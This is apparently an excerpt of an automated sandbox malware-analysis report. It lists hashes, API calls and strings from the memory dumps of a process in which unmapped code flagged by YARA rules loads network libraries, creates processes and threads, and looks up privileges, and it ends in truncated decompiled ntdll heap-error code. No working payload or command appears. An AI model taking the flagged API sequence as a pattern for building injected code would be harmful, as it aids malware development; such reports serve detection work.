Opcode Fuzzy Hash: cc1664db9f89cca0bd27578505676ac60df4309181603d60858678ff0b180b11
Instruction Fuzzy Hash: 9C90027231115502D1106159D44470A051597D1241F91C811A4814558D86D588917167

Uniqueness

Uniqueness Score: -1.00%

Function 05009650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0500965A

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25afbf220b2e4781690d5c7ba2f5b5d062fbd72fb14cb369689650d465c93c05
Instruction ID: 0dec37bcf279ca54f64cbafb0f9c791daf8ba68cd1d080677ff71137654188ac
Opcode Fuzzy Hash: 25afbf220b2e4781690d5c7ba2f5b5d062fbd72fb14cb369689650d465c93c05
Instruction Fuzzy Hash: 1990027220505942D14071599444A4A052597D0345F91C411A4054694D96658D55B6A6

Uniqueness

Uniqueness Score: -1.00%

Function 05009660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0500966A

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ad42dc4e782b3170a3d71139d5abb90a7e347e8a19f3d171ce34dfee577f21ab
Instruction ID: 80836b83cdcd0b343acd08c5db172da1f2b3a447ee43d81c3e844e3ebefbeb92
Opcode Fuzzy Hash: ad42dc4e782b3170a3d71139d5abb90a7e347e8a19f3d171ce34dfee577f21ab
Instruction Fuzzy Hash: 3F90027220101902D1807159944464E051597D1341FD1C415A4015654DCA558A5977E6

Uniqueness

Uniqueness Score: -1.00%

Function 050096D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050096DA

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6539aeccff5fb4d738dc72951503530f508e921d49118bd26e550a0f3ac2e7b3
Instruction ID: fe9bd1766f766b487ba679b851aab1962d3b7913e091490ce30efea5ef36995b
Opcode Fuzzy Hash: 6539aeccff5fb4d738dc72951503530f508e921d49118bd26e550a0f3ac2e7b3
Instruction Fuzzy Hash: 3190027220101942D10061599444B4A051597E0341F91C416A4114654D8655C8517566

Uniqueness

Uniqueness Score: -1.00%

Function 050096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050096EA

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 77f552810ffdfc8b02dadfbb4582593c61755e8da0c076b0626ba59350a65c94
Instruction ID: 00d0e11d32e41a7de958abd14d6cbaa59090cc9651f71d97d3820af306cd3487
Opcode Fuzzy Hash: 77f552810ffdfc8b02dadfbb4582593c61755e8da0c076b0626ba59350a65c94
Instruction Fuzzy Hash: 7B90027220109902D1106159D44474E051597D0341F95C811A8414658D86D588917166

Uniqueness

Uniqueness Score: -1.00%

Function 05009910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0500991A

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7891cd7c20d387631ab5cc2bd1f3e15f8adb29425940e37f9d15031ca660a27a
Instruction ID: c05cb6c0378a570c0b4d6d68ab5dc01880e3d80f258302ea09f6c89be681020f
Opcode Fuzzy Hash: 7891cd7c20d387631ab5cc2bd1f3e15f8adb29425940e37f9d15031ca660a27a
Instruction Fuzzy Hash: D29002B220101502D1407159944474A051597D0341F91C411A9054554E86998DD576AA

Uniqueness

Uniqueness Score: -1.00%

Function 050099A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 050099AA

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 17b7ad4da9e5213d48cc373015aed4af2bd2a8d91360914ff204ee536b65a5de
Instruction ID: 2c2aaf97f61071dd2ac6d0c95652a9a8250593511b5c7b4c8a93fd10204fae9b
Opcode Fuzzy Hash: 17b7ad4da9e5213d48cc373015aed4af2bd2a8d91360914ff204ee536b65a5de
Instruction Fuzzy Hash: 2A9002A234101542D10061599454B0A0515D7E1341F91C415E5054554D8659CC52716B

Uniqueness

Uniqueness Score: -1.00%

Function 05009840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0500984A

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c4ea00fa5af409408dc452312138adefdf239d1bfaeb046d5112c582c09cb5df
Instruction ID: eacacbd357e33bd11bad6943c6611d8b60fe70c7343b61ced261c78498d2936c
Opcode Fuzzy Hash: c4ea00fa5af409408dc452312138adefdf239d1bfaeb046d5112c582c09cb5df
Instruction Fuzzy Hash: F3900262242052525545B159944450B4516A7E02817D1C412A5404950C85669856E666

Uniqueness

Uniqueness Score: -1.00%

Function 05009860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0500986A

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 469362e92b13d3819b2d501666f2983013eeb9cc0f1b3755a3dd720a9b38af54
Instruction ID: b65ea9415b9fad8b3f57977b5a9cfbac2594d6ff19587efa90b186ba931eb307
Opcode Fuzzy Hash: 469362e92b13d3819b2d501666f2983013eeb9cc0f1b3755a3dd720a9b38af54
Instruction Fuzzy Hash: 3090027220101513D1116159954470B051997D0281FD1C812A4414558D96968952B166

Uniqueness

Uniqueness Score: -1.00%

Function 05009A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05009A5A

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 442524793248c4cc5fb5d4e35728324bd3f16fd236f9b38c87d23d6144044dd6
Instruction ID: 3ed79eed5667edae399977b2cccd0e663e544832903c4b35ce563d5d1b9454b4
Opcode Fuzzy Hash: 442524793248c4cc5fb5d4e35728324bd3f16fd236f9b38c87d23d6144044dd6
Instruction Fuzzy Hash: 9590026221181142D20065699C54B0B051597D0343F91C515A4144554CC95588616566

Uniqueness

Uniqueness Score: -1.00%

Function 03018C40, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03018CE8

Strings

net.dll, xrefs: 03018CB1, 03018D37, 03018D0F, 03018D1B, 03018D43
wininet.dll, xrefs: 03018C9E, 03018CA7

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 6ba6e2193b7375724587143848d6886317518ac4e558dc9da06e331420d8dba5
Instruction ID: dd7b42421f924d38bdf198ac3b7b27ea542ce2fa4d4455453c7312d6b51c49ad
Opcode Fuzzy Hash: 6ba6e2193b7375724587143848d6886317518ac4e558dc9da06e331420d8dba5
Instruction Fuzzy Hash: 7D3181B6501744BBC724DF65D884FABBBF8BB88700F04851DE6299B241D771A660CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03018C39, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03018CE8

Strings

net.dll, xrefs: 03018CB1, 03018D0F, 03018D1B
wininet.dll, xrefs: 03018C9E, 03018CA7

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 52f40073beaa0c4b9486963597b9f67ce270cf0fea64bf83fd95c0424b3993e8
Instruction ID: 0c819dd8619e935dd69dfd8f164171cdf5ef463b2ccc317509dc4553d3086a15
Opcode Fuzzy Hash: 52f40073beaa0c4b9486963597b9f67ce270cf0fea64bf83fd95c0424b3993e8
Instruction Fuzzy Hash: AE2196B6641348BFC710DF65D8C5FABBBF8BB88700F14841DE6196B241D771A660CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0301A230, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03003AF8), ref: 0301A25D

Strings

.z`, xrefs: 0301A24C, 0301A258

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: aaf74a90272c308e4c8efddfa904b01e21671f2be88f61bca94d3761fd2b5016
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: C0E01AB52102046BD714DF59DC44EA777ADAF88650F014555B9085B241C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 030082EB, Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0300834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0300836B

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 7b91151c292ca3c64009228577a2465b9811720c16738eaea9993432618c6945
Instruction ID: aa4824bd876d8a49d57edc73618862034c313b92e4cf151eeb64f103e259d6f4
Opcode Fuzzy Hash: 7b91151c292ca3c64009228577a2465b9811720c16738eaea9993432618c6945
Instruction Fuzzy Hash: 06012836B813187BF720D6948C02FFE7B6CAB80B10F154049FA08BE1C1E6A4650647E4

Uniqueness

Uniqueness Score: -1.00%

Function 030082F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0300834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0300836B

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 3ede93827de3ae0d75881d6d8865e2a67444da6a833386ffff7f289df5983fdb
Instruction ID: 3787ee78b2d750f8723f3f7f45f0db64ffd542eea77c5a050a8568dc12fe4dac
Opcode Fuzzy Hash: 3ede93827de3ae0d75881d6d8865e2a67444da6a833386ffff7f289df5983fdb
Instruction Fuzzy Hash: F101A235A813287BF720E6A49C02FFE776C6B80B50F054158FF08BE1C1E6A4691646F5

Uniqueness

Uniqueness Score: -1.00%

Function 0300F688, Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,03008CF4,?), ref: 0300F6BB

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 3d57f9c102db13a0f2fe515453c152f2e35469b5b18ad32ff90a7a82701b4f4b
Instruction ID: 9a1e03282edc9b59ee3f8b00ddbfeae54f20377df9c19757d6b4297568fc2288
Opcode Fuzzy Hash: 3d57f9c102db13a0f2fe515453c152f2e35469b5b18ad32ff90a7a82701b4f4b
Instruction Fuzzy Hash: FC01A7BAA4530C3AFB20EA94DC46FFB73AC9F94754F044184F90C9A1D2DBB0959086A1

Uniqueness

Uniqueness Score: -1.00%

Function 0300ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0300AD32

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction ID: d8ab62c9d9ccb3a5020145d7dbafcc3251bafe84952df0d8d572f03f3d1f586e
Opcode Fuzzy Hash: 4e7e6ba31bbc1c6f731b244d46290ada3a087f6c5bf953407071256f7589dc13
Instruction Fuzzy Hash: C10125B9E4120DABEF10DBE4DC41FDDB7B89B44204F044595E9199B180F671EB15CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0301A262, Relevance: 1.5, APIs: 1, Instructions: 45processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0301A2F4

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 2666c990f58a185566ebd19b56d5de694712ce2dc3644f130e0b109739dcd2c0
Instruction ID: af635c1955b069cf4b50fe1c2b5c064cd1312362c805d179f8689d8a59462886
Opcode Fuzzy Hash: 2666c990f58a185566ebd19b56d5de694712ce2dc3644f130e0b109739dcd2c0
Instruction Fuzzy Hash: F7F03C762151187BCB14DF98DC90EEB77ADAF8C260F008559FA4C97201C531E9108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0301A29D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0301A2F4

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 839b26ff74eb1b266cd3547d9f13e5e23aeb6971c96b0ae155003c7454db2c48
Instruction ID: e7883aa6513483478a5fdb70ad097bb0b652f3f36440c93d8afa4bb08c630f82
Opcode Fuzzy Hash: 839b26ff74eb1b266cd3547d9f13e5e23aeb6971c96b0ae155003c7454db2c48
Instruction Fuzzy Hash: 7501A4B2215108ABCB54DF89DC90EEB37AEAF8C754F158258FA1D97241C630E851CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0301A2A0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0301A2F4

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 733796e97c17ad7a61ac92b51b53e700201bfd9c6f6431f59b3db14c15768c22
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 8701AFB2211208ABCB54DF89DC80EEB77AEAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03018D70, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0300F010,?,?,00000000), ref: 03018DAC

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: b512f9994d643e4b92f2350c44a56a501f50797821ade48fffa383d0c2f7447a
Instruction ID: 69a97b89e36324a66c9e1a9a862447f2c0ba5ee4eae60c9cce5cc15c31f38f0b
Opcode Fuzzy Hash: b512f9994d643e4b92f2350c44a56a501f50797821ade48fffa383d0c2f7447a
Instruction Fuzzy Hash: 0DE06D773813043AE230A599AC02FE7B39C8B91B60F590026FA4DEB2C0D595F41142A4

Uniqueness

Uniqueness Score: -1.00%

Function 03018D63, Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0300F010,?,?,00000000), ref: 03018DAC

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4316bc3e574137d2f1baa5fce74c4c753c858ec51b8be14f585887d315770a5a
Instruction ID: d4deb0c7ee9c941a1dfd1f5aa1acada3090cf5772951056898d22af3a789d6a0
Opcode Fuzzy Hash: 4316bc3e574137d2f1baa5fce74c4c753c858ec51b8be14f585887d315770a5a
Instruction Fuzzy Hash: 99F09B763813003BE33195599C02FE7B7989F95F10F19052DF689EF6C0D5A5B45187A4

Uniqueness

Uniqueness Score: -1.00%

Function 0301A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0300F192,0300F192,?,00000000,?,?), ref: 0301A3C0

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: a8de867fe50a5dfa28c97414f2c35cfacaaeee74b4219886c82f0f805d725465
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 0CE01AB52002086BDB10DF49DC84FE737ADAF88650F018155BA085B241C930F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0301A1F0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(030144F6,?,03014C6F,03014C6F,?,030144F6,?,?,?,?,?,00000000,00000000,?), ref: 0301A21D

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 2b8891b8730a9138dbe6ad952232a04e341459ad73532a90d652677729170ad3
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 7BE012B5211208ABDB14EF99DC80EA777ADAF88660F118559BA085B242C630F9108BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0300F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,03008CF4,?), ref: 0300F6BB

Memory Dump Source

Source File: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, Offset: 03000000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction ID: 79109a0ac0fbcb7afb07c176877e37d69124e6ec37b5f1776629962f8d6299e9
Opcode Fuzzy Hash: 7ea49bcfd7eb89cfce1dd1d38e7dcc5e35a49d50de701d0c82c68256bf4518e3
Instruction Fuzzy Hash: B2D0A7767903043BF620FAA59C03F6673CC5B44B00F490064F948DB3C3DA60E0104165

Uniqueness

Uniqueness Score: -1.00%

Function 0500967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05009694

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1b78e9302a3febee06a89ccb37c60c7451b1c0be5ea56faab08b0f837906ff24
Instruction ID: 86f464d427b50a9028e28ed1036b0e1143a6085cf5d31ef3b2c75e28ecc82854
Opcode Fuzzy Hash: 1b78e9302a3febee06a89ccb37c60c7451b1c0be5ea56faab08b0f837906ff24
Instruction Fuzzy Hash: 9AB09B729014D5C5E651D7605608B2F7E5177D0741F56C551D1020745B4778C091F5B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0507B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

The resource is owned shared by %d threads, xrefs: 0507B37E
*** An Access Violation occurred in %ws:%s, xrefs: 0507B48F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0507B484
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0507B2F3
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0507B38F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0507B305
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0507B39B
*** then kb to get the faulting stack, xrefs: 0507B51C
<unknown>, xrefs: 0507B27E, 0507B2D1, 0507B350, 0507B399, 0507B417, 0507B48E
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0507B53F
The resource is owned exclusively by thread %p, xrefs: 0507B374
This failed because of error %Ix., xrefs: 0507B446
*** enter .exr %p for the exception record, xrefs: 0507B4F1
*** Inpage error in %ws:%s, xrefs: 0507B418
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0507B2DC
an invalid address, %p, xrefs: 0507B4CF
read from, xrefs: 0507B4AD, 0507B4B2
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0507B47D
a NULL pointer, xrefs: 0507B4E0
Go determine why that thread has not released the critical section., xrefs: 0507B3C5
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0507B476
*** enter .cxr %p for the context, xrefs: 0507B50D
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0507B314
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0507B3D6
The instruction at %p tried to %s , xrefs: 0507B4B6
The critical section is owned by thread %p., xrefs: 0507B3B9
write to, xrefs: 0507B4A6
The instruction at %p referenced memory at %p., xrefs: 0507B432
*** Resource timeout (%p) in %ws:%s, xrefs: 0507B352
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0507B323

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 0b9aa3ff80aae8af5ce241dfe260ff28391dcb102618d8388100ccefc638e98d
Instruction ID: b741b8b349329fc3d8d03b097b0515cb3ba78d7db4141ce57f687d52fd8edc9a
Opcode Fuzzy Hash: 0b9aa3ff80aae8af5ce241dfe260ff28391dcb102618d8388100ccefc638e98d
Instruction Fuzzy Hash: 4081F279E40208FFDB25AA16BC89EEF3F66EF57A61F404044F8052B111E761E452CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 05081C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E05081C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4fa48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04FCB150();
				} else {
					E04FCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x50b589c);
				E04FCB150("Heap error detected at %p (heap handle %p)\n",  *0x50b58a0);
				_t27 =  *0x50b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M05081E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04FCB150();
				} else {
					E04FCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
